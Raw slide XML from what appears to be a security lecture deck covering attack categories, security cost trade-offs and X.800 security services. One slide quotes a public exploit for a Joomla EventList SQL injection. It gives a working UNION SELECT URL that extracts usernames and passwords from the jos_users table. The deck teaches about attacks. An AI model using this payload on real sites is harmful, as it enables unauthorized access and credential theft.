          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://www.cvedetails.com/cve/CVE-2007-4509</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL injection vulnerability in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>EventList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> component (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>com_eventlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) 0.8 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the did parameter in a details action. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Ritaglio scherma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258972"/>
            <a:ext cx="8478433" cy="2086266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3105100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smtClean="0"/>
              <a:t>ATTACK - EXAMPLE</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>http://www.milw0rm.com/exploits/4309</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rettangolo 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="2348880"/>
            <a:ext cx="8280920" cy="39900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r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>[[SQL]]]---------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>http://[target]/[path]//index.php?option=com_eventlist&amp;func=details&amp;did=[SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>index.php?option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>com_eventlist&amp;func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>details&amp;did</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>=9999999999999%20union%20select%200,0,concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>(117,115,101,114,110,97,109,101,58),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>username,char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>[[/SQL]]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>"""""""""""""""""""""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>ajann,Turkey</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t># ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t># Im </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> Hacker!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="it-IT"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DICTIONARY - III</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1495425"/>
            <a:ext cx="8229600" cy="4454525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>moves</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>types</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Attacks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>integrity</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>counterfeiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>theft</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Attacks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Weak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> and strong information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>theft</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Attacks to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>quality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> of service </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>(Distributed) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Denial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> of service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Authenticity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>accountability</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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1731876" y="1295400"/>
            <a:ext cx="5832648" cy="543660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endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539750" y="2133600"/>
            <a:ext cx="8229600" cy="3989388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" sz="2800" i="1" dirty="0" smtClean="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smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>				—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>The Art of War, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>Sun Tzu</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="it-IT" dirty="0" smtClean="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4" y="4408974"/>
            <a:ext cx="2467674" cy="246767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PARANOID vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>unsecured</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="1557338"/>
            <a:ext cx="8686800" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Estimated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Money </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>loss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> due to security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>breaches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> company = L</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Estimated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>cost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> of security (new firewalls, etc.) = S</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Estimated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Money </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>loss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> due to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>uncontrolled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>programmers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>paranoidism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> = D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0" smtClean="0"/>
              <a:t>L &gt; S+D</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Diagramma 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5724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0" y="1772816"/>
            <a:ext cx="8450767" cy="436148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0" y="1772816"/>
            <a:ext cx="8496944" cy="431550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smtClean="0"/>
              <a:t>Security Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>enhance security of data processing systems and information transfers of an organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>intended to counter security attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>using one or more security mechanisms </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>often replicates functions normally associated with physical documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>which, for example, have signatures, dates; need protection from disclosure, tampering, or destruction; be notarized or witnessed; be recorded or licensed</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"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52400"/>
            <a:ext cx="8229600" cy="1139825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security Services (X.800)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8229600" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" smtClean="0"/>
              <a:t>assurance that communicating entity is the one claimed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
